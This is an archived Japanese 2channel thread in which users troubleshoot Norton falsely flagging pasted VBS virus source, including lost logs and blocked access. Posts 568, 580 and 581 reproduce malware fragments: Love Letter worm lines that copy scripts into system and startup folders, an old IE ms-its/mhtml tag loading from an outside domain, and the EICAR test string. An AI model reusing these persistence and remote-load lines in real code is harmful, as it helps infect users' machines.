[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
上下前次1-新
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
562: 2006/06/05(月)19:44 ID:??? AAS
ここを読み直せ
563(2): 2006/06/06(火)18:14 ID:yssu6HWa(1) AAS
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblockで侵入感知反応してしまって、
2chの該当IPをアク禁にしてしまってるようなんです。
この場合の対応はどのようにすればよいでしょうか?
ノートン切らないと、ログを取得するどころか、
スレ単位、はなはだしくは板単位でアクセスすらできません。
564(1): 2006/06/06(火)18:17 ID:??? AAS
>>563
リカバリしろデブ。
565(1): 2006/06/06(火)18:30 ID:??? AAS
どの専ブラでも基本はログと書き込みフォルダを
除外すればおk?
566: ぴーこ名無しさん 2006/06/07(水)01:17 ID:??? AAS
>>563
外部リンク[html]:mickey.mirv.net
>>565
外部リンク:ansitu.xrea.jp の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。
567: 2006/06/07(水)18:58 ID:??? AAS
>>564
リカバリしろデブ。
568(3): <body onload=window()> [eip = eip + unescape("%u7030%u4300")] 2006/06/08(木)03:34 ID:??? AAS
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
569: 2006/06/08(木)03:36 ID:??? AAS
>568
570(1): 2006/06/08(木)04:18 ID:??? AAS
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり2ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。
これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか?
ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。
571(1): 2006/06/08(木)04:21 ID:??? AAS
570ですが補足です。
表示したスレは
2chスレ:newsplus
で、ここの>>5にそのソースが書いてありました。
572(1): 2006/06/08(木)04:23 ID:??? AAS
>>570
行間が広くなるのはシリア語ブラクラじゃないのか?
573(1): 2006/06/08(木)04:27 ID:??? AAS
>>571
5の最後の行にシリア語書いてあるね
574: 2006/06/08(木)04:48 ID:??? AAS
>>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ
さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?
575(1): 2006/06/08(木)05:11 ID:??? AAS
AA省
576: [age] 2006/06/12(月)11:39 ID:??? AAS
このスレだと反応しないのは何で?
577(3): 2006/06/13(火)14:13 ID:??? AAS
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
外部リンク:ansitu.xrea.jp
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。
エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?
578(1): 2006/06/13(火)20:49 ID:??? AAS
>>577
きちんと専ブラのログを除外する
579(1): 577 2006/06/14(水)13:32 ID:??? AAS
AA省
580(1): 2006/06/17(土)22:54 ID:??? AAS
>>2ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
省19
581(1): 2006/06/18(日)17:52 ID:k4PxNBCi(1) AAS
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
省2
上下前次1-新書関写板覧索設栞歴
あと 421 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.015s